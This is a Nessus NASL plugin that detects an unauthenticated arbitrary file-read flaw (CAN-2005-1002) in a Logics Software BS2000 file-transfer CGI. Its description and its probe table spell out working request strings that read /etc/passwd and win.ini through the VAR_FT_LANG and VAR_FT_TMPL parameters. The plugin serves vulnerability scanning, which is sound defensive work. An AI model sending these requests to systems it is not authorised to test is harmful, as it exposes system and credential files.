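#
# (c) Chase The Sun, Roman Ramirez
#
# Nessus plugin: checks whether the Logics Software "File Transfer from
# BS2000 Host to Web Client" CGI (logwebftbs2000.exe) serves arbitrary
# files to an unauthenticated client that supplies its own VAR_FT_LANG /
# VAR_FT_TMPL values.  Each probe asks for a file that exists on a stock
# install of the platform and looks for a marker line in the response;
# the first positive probe reports the hole and the plugin stops.
#

if (description) {
  script_id(90000);
  script_bugtraq_id(12998);
  script_cve_id("CAN-2005-1002");
  script_version ("$Revision: 1.0 $");

  name["english"] = "Logics Software Filetransfer from BS2000 Host to Web Client Access Validation Error";
  script_name(english:name["english"]);

  desc["english"] = " Without authentication nor authorization it is possible to exploit 'File Transfer from BS2000 Host to Web Client' just replacing the variables VAR_FT_*; VAR_FT_LANG manages the language that will be used for templates and VAR_FT_TMPL manages the template to be used. Replacing VAR_FT_LANG with 'c:\' (whatever) and VAR_FT_TMPL with the file we want to read (i.e: winnt/win.ini) we have read acces to the resource requested (most files in the filesystem). For example, http://www.myserver.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini will give us the contents for: c:\winnt\win.ini. In UNIX systems you can test the vulnerability just with: http://www.myserver.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd Nessus has tested for access windows and winnt directories in Microsoft Windows platforms. Solution : Disable the CGI Risk factor : High";
  script_description(english:desc["english"]);

  summary["english"] = "Determines if can access logwebftbs2000.exe?VAR_FT_LANG=";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005 Chase The Sun");
  script_family(english:"Misc.", francais:"Divers");
  script_require_ports(80);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if (! port) exit(0);

# Probe table.  queries[i] is the CGI request to send, markers[i] the
# egrep pattern that must appear in the disclosed file for probe i to
# count as a hit.  Order: /etc/passwd (UNIX), then win.ini under the two
# common Windows system directories.
#
# The query strings are double-quoted on purpose: NASL does not process
# backslash escapes in double-quoted strings, so "c:\winnt" is sent
# literally.  The marker patterns are single-quoted (escapes processed).
#
# The passwd marker is anchored on the uid/gid fields of the root entry
# rather than the bare text "root:", so an ordinary web page that happens
# to mention "root:" does not produce a false positive.
#
# Both Windows probes use the same marker: a comment line present in every
# stock win.ini.  (The original script compared the c:\windows response
# against the passwd marker, which could never match a win.ini file, so
# that branch was silently dead.)
queries = make_list(
  "/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd",
  "/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\winnt&VAR_FT_TMPL=win.ini",
  "/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\windows&VAR_FT_TMPL=win.ini"
);
markers = make_list(
  'root:.*:0:[01]:',
  '; for 16-bit app support',
  '; for 16-bit app support'
);

for (i = 0; i < max_index(queries); i++) {
  req = http_get(item:queries[i], port:port);
  res = http_keepalive_send_recv(port:port, data:req);

  # No answer at all means the service went away (or never spoke HTTP);
  # further probes would only time out, so give up as the original did.
  if (! res) exit(0);

  if (egrep(pattern:markers[i], string:res)) {
    security_hole(port);
    exit(0);
  }
}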